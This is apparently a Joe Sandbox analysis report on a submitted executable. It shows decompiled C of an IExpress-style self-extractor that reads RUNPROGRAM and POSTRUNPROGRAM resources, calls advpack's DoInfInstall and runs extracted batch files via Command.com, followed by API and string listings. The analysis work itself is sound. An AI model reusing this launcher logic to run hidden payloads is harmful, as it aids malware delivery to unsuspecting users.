                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E00A41AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E00A46CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E00A43FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0xa48580;
                                                                                                                                                                                                                                            													if( *0xa48580 != 0) {
                                                                                                                                                                                                                                            														E00A42267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0xa48180;
                                                                                                                                                                                                                                            											if( *0xa48180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E00A444B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0xa49124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa49a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E00A46495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E00A444B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E00A444B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa48a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_t96 =  *0xa49a40; // 0x3
                                                                                                                                                                                                                                            											_v364 = _t96;
                                                                                                                                                                                                                                            											_t97 =  *0xa48a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0xa49154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0xa491e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0xa48a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0xa49a34; // 0x1
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0xa48d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t98 =  *0xa49a38; // 0x0
                                                                                                                                                                                                                                            											_v356 = _t98;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0xa4a288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0xa49124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa49a40 - 1; // 0x3
                                                                                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa48a20;
                                                                                                                                                                                                                                            										if( *0xa48a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            										E00A4202A(_t146); // executed
                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v280;
                                                                                                                                                                                                                                            									_t108 = E00A4468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                            									__eflags = _t108;
                                                                                                                                                                                                                                            									if(_t108 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0xa48c42;
                                                                                                                                                                                                                                            									if( *0xa48c42 != 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                            									__eflags = _t112 == 0;
                                                                                                                                                                                                                                            									if(_t112 == 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t118 =  *0xa48a38; // 0x0
                                                                                                                                                                                                                                            								if(_t118 == 0) {
                                                                                                                                                                                                                                            									L23:
                                                                                                                                                                                                                                            									if(_t153 != 0) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E00A4468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                            										goto L27;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L25;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                            									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            										goto L62;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "USRQCMD";
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E00A4468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                            										_t153 = 1;
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L26:
                                                                                                                                                                                                                                            						_push(_t130);
                                                                                                                                                                                                                                            						_t146 = 0x104;
                                                                                                                                                                                                                                            						E00A41781( &_v276, 0x104, _t130, 0xa48c42);
                                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t130 = "REBOOT";
                                                                                                                                                                                                                                            				_t125 = E00A4468F(_t130, 0xa49a2c, 4);
                                                                                                                                                                                                                                            				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a43c28
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43c30
                                                                                                                                                                                                                                            0x00a43c39
                                                                                                                                                                                                                                            0x00a43c40
                                                                                                                                                                                                                                            0x00a43d13
                                                                                                                                                                                                                                            0x00a43d15
                                                                                                                                                                                                                                            0x00a43d21
                                                                                                                                                                                                                                            0x00a43d26
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43c4f
                                                                                                                                                                                                                                            0x00a43c56
                                                                                                                                                                                                                                            0x00a43c60
                                                                                                                                                                                                                                            0x00a43c65
                                                                                                                                                                                                                                            0x00a43c77
                                                                                                                                                                                                                                            0x00a43c78
                                                                                                                                                                                                                                            0x00a43c7c
                                                                                                                                                                                                                                            0x00a43c7e
                                                                                                                                                                                                                                            0x00a43c82
                                                                                                                                                                                                                                            0x00a43c82
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43c7c
                                                                                                                                                                                                                                            0x00a43c67
                                                                                                                                                                                                                                            0x00a43c69
                                                                                                                                                                                                                                            0x00a43c6d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43c58
                                                                                                                                                                                                                                            0x00a43c58
                                                                                                                                                                                                                                            0x00a43c6e
                                                                                                                                                                                                                                            0x00a43c6e
                                                                                                                                                                                                                                            0x00a43c87
                                                                                                                                                                                                                                            0x00a43c89
                                                                                                                                                                                                                                            0x00a43d4d
                                                                                                                                                                                                                                            0x00a43d4f
                                                                                                                                                                                                                                            0x00a43d50
                                                                                                                                                                                                                                            0x00a43d52
                                                                                                                                                                                                                                            0x00a43d9e
                                                                                                                                                                                                                                            0x00a43da8
                                                                                                                                                                                                                                            0x00a43daf
                                                                                                                                                                                                                                            0x00a43db4
                                                                                                                                                                                                                                            0x00a43db6
                                                                                                                                                                                                                                            0x00a43f4d
                                                                                                                                                                                                                                            0x00a43f4d
                                                                                                                                                                                                                                            0x00a43f4f
                                                                                                                                                                                                                                            0x00a43f56
                                                                                                                                                                                                                                            0x00a43f57
                                                                                                                                                                                                                                            0x00a43f58
                                                                                                                                                                                                                                            0x00a43f63
                                                                                                                                                                                                                                            0x00a43f63
                                                                                                                                                                                                                                            0x00a43dbc
                                                                                                                                                                                                                                            0x00a43dc0
                                                                                                                                                                                                                                            0x00a43dc2
                                                                                                                                                                                                                                            0x00a43de6
                                                                                                                                                                                                                                            0x00a43de6
                                                                                                                                                                                                                                            0x00a43de8
                                                                                                                                                                                                                                            0x00a43f0b
                                                                                                                                                                                                                                            0x00a43f0b
                                                                                                                                                                                                                                            0x00a43f0f
                                                                                                                                                                                                                                            0x00a43f13
                                                                                                                                                                                                                                            0x00a43f15
                                                                                                                                                                                                                                            0x00a43f1a
                                                                                                                                                                                                                                            0x00a43f1c
                                                                                                                                                                                                                                            0x00a43f46
                                                                                                                                                                                                                                            0x00a43f47
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43f47
                                                                                                                                                                                                                                            0x00a43f1e
                                                                                                                                                                                                                                            0x00a43f1f
                                                                                                                                                                                                                                            0x00a43f25
                                                                                                                                                                                                                                            0x00a43f26
                                                                                                                                                                                                                                            0x00a43f2a
                                                                                                                                                                                                                                            0x00a43f2d
                                                                                                                                                                                                                                            0x00a43fd9
                                                                                                                                                                                                                                            0x00a43fd9
                                                                                                                                                                                                                                            0x00a43fda
                                                                                                                                                                                                                                            0x00a43fda
                                                                                                                                                                                                                                            0x00a43fe1
                                                                                                                                                                                                                                            0x00a43fe3
                                                                                                                                                                                                                                            0x00a43fe3
                                                                                                                                                                                                                                            0x00a43fe8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43fe8
                                                                                                                                                                                                                                            0x00a43f33
                                                                                                                                                                                                                                            0x00a43f37
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43f37
                                                                                                                                                                                                                                            0x00a43dee
                                                                                                                                                                                                                                            0x00a43dee
                                                                                                                                                                                                                                            0x00a43df5
                                                                                                                                                                                                                                            0x00a43fad
                                                                                                                                                                                                                                            0x00a43fb9
                                                                                                                                                                                                                                            0x00a43fc2
                                                                                                                                                                                                                                            0x00a43fc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43fc8
                                                                                                                                                                                                                                            0x00a43dfb
                                                                                                                                                                                                                                            0x00a43dfd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43e03
                                                                                                                                                                                                                                            0x00a43e0a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43e15
                                                                                                                                                                                                                                            0x00a43e17
                                                                                                                                                                                                                                            0x00a43e19
                                                                                                                                                                                                                                            0x00a43f94
                                                                                                                                                                                                                                            0x00a43fa4
                                                                                                                                                                                                                                            0x00a43f7c
                                                                                                                                                                                                                                            0x00a43f80
                                                                                                                                                                                                                                            0x00a43f8b
                                                                                                                                                                                                                                            0x00a43c03
                                                                                                                                                                                                                                            0x00a43be2
                                                                                                                                                                                                                                            0x00a43be7
                                                                                                                                                                                                                                            0x00a43bee
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A43C11
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A43CDC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A48C42), ref: 00A43D8F
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A43E26
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A48C42), ref: 00A43EFF
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A48C42), ref: 00A43F1F
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00A48C42), ref: 00A43F40
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,?,00A48C42), ref: 00A43F47
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A48C42), ref: 00A43F76
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A48C42), ref: 00A43F80
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A48C42), ref: 00A43FC2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                                                            • API String ID: 1032054927-2188045420
                                                                                                                                                                                                                                            • Opcode ID: 2b42c5ecfa60dcfe5880697c4432815b2f9e8bb09a3e45ff51338d638444bdad
                                                                                                                                                                                                                                            • Instruction ID: 8786930b11a2b55e893d749f474837ffaf53dc28f2d935f0f756aad58300c3f1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b42c5ecfa60dcfe5880697c4432815b2f9e8bb09a3e45ff51338d638444bdad
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5B1427E9083009BDB20DF648845B6B76E4EBD5740F10092DFA85D61D0EBB5CE4ACB92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A41AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                            				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xa48004; // 0x173b1603
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00A41680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00A41A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00A41781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
					E00A4658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00A41680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00A466C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00A466C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00A41680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00A41781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00A416B3( &_v1552, 0x400, " ");
										E00A416B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00A42AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00A4171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00A41A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00A41A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00A444B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
